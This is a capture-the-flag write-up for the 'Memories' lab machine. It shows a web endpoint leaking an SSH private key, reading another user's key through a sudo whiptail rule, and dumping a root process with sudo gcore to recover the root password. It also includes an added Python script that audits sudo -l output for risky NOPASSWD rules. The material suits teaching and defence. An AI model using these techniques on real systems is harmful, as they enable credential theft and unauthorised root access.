HMV Memories Summary

2026-04-17, 221 words

This is a Linux machine whose web service leaks laura's OpenSSH private key; I then leverage some LOTL (living off the land) techniques to obtain the root user's password.

Scope

  • Name: Memories
  • Difficulty: (2/10)
  • OS: Linux
  • IP: memories.hmv (192.168.56.137)

Enumeration

The nmap scan reveals that only SSH and a web service are exposed, so I first try some common endpoints on the web server.

❯ curl 'http://memories.hmv/robots.txt'
/memories

It hints that there is a /memories endpoint. I discover it is a login form that requires credentials, but the interesting thing is that it leaks an OpenSSH private key when I request it with the POST method.

❯ curl 'http://memories.hmv/memories' -X POST -L
laura
<!--
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
-->

With that key I obtain the initial foothold on the system.

Privilege Escalation

After logging in with that private key, I immediately discover the following sudo rule for a LOTL tool that could be abused.

laura@memories:~$ sudo -l
Matching Defaults entries for laura on memories:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User laura may run the following commands on memories:
    (lucy) NOPASSWD: /usr/bin/whiptail

User lucy owns her own .ssh directory there, so I decide to leverage whiptail to read out her SSH private key.

With the information from GTFOBins, I get the correct options for that tool.

whiptail --textbox --scrolltext /path/to/file 0 0

After that, I discover that lucy also has a similar sudo rule.

lucy@memories:~$ sudo -l
Matching Defaults entries for lucy on memories:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucy may run the following commands on memories:
    (ALL : ALL) NOPASSWD: /usr/bin/gcore
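As an added defender-side example (not part of the original writeup), the following script parses `sudo -l` output like the two listings above and flags NOPASSWD rules whose binary is known to read arbitrary files or dump process memory; the watchlist is an assumption seeded with the two binaries from this box, and the sample input is constructed from the listings on this page.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the two `sudo -l` listings from this writeup.
SUDO_L_LAURA = r"""Matching Defaults entries for laura on memories:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User laura may run the following commands on memories:
    (lucy) NOPASSWD: /usr/bin/whiptail
"""
SUDO_L_LUCY = r"""User lucy may run the following commands on memories:
    (ALL : ALL) NOPASSWD: /usr/bin/gcore
"""

# Hypothetical watchlist: binaries GTFOBins documents as sudo file-read or
# memory-dump primitives, seeded with the two seen on this box (extend it).
WATCHLIST = {"whiptail": "reads arbitrary files (--textbox)",
             "gcore": "dumps process memory, may contain secrets"}

# Matches one rule line such as "(lucy) NOPASSWD: /usr/bin/whiptail".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

@dataclass(frozen=True)
class SudoRule:
    runas: str
    nopasswd: bool
    command: str

def parse_sudo_l(text: str) -> list[SudoRule]:
    """Extract (runas, NOPASSWD, command) triples from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults, secure_path and header lines carry no rule
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append(SudoRule(m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules

def audit(text: str) -> list[str]:
    """Return one finding per NOPASSWD rule whose binary is on the watchlist."""
    findings = []
    for r in parse_sudo_l(text):
        name = r.command.split()[0].rsplit("/", 1)[-1]  # basename of the binary
        if r.nopasswd and name in WATCHLIST:
            scope = "root-equivalent" if r.runas.startswith("ALL") else f"as {r.runas}"
            findings.append(f"{r.command} {scope}: {WATCHLIST[name]}")
    return findings

if __name__ == "__main__":
    for sample in (SUDO_L_LAURA, SUDO_L_LUCY):
        print("\n".join(audit(sample)) or "no risky NOPASSWD rules")
```

Running it against real hosts means feeding it `sudo -l -U <user>` output for each account; a `(ALL : ALL)` hit on a memory-dumping tool is the one to remediate first.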

From the output of pspy, which monitors Linux processes, I learn that the root user runs /root/memories every minute. So I use the following command to make a core dump of that process.

while :; do ps -ef | grep memories | grep -v grep | xargs sudo /usr/bin/gcore ; done

Then I recover the root user's password from the dump with strings.
